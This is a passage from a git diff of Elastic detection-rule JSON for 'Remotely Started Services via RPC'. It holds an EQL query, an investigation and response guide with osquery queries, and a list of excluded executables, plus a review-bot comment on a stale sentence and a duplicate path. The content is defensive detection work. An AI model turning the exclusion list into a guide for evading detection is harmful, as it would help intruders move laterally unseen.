This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n 
\"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -112,7 +112,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json index dce684546e9..271168e5ddb 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_107.json 
@@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n 
\"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. 
Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. 
If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n 
\"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n",
 "references": [
 "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f"
 ],
@@ -112,7 +112,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json
index 6160a615af0..b822c737106 100644
--- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json
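Review bot: The final triage step in the new `note` still says `searching for login events (for example, 4624) to the target host after the registry modification`, but this rule correlates an inbound services.exe connection with a child-process start and never looks at the registry, so the sentence appears to have been carried over from another guide; it should read `after the service was started`. The `query` exclusion list also contains `?:\\Pella Corporation\\Pella Order Management\\GPAutoSvc.exe` twice, so one copy can be dropped without changing what the list matches. Both points apply verbatim to the same `@@ -13,8 +13,8 @@` hunk of aa9a274d-6b53-424d-ac5e-cb8ca4251650_108.json. The change itself only replaces JSON `\u003e` escapes with a literal `>`, which decodes to the identical string, so neither point is a regression introduced by this commit.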
@@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n 
\"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. 
Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. 
If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n 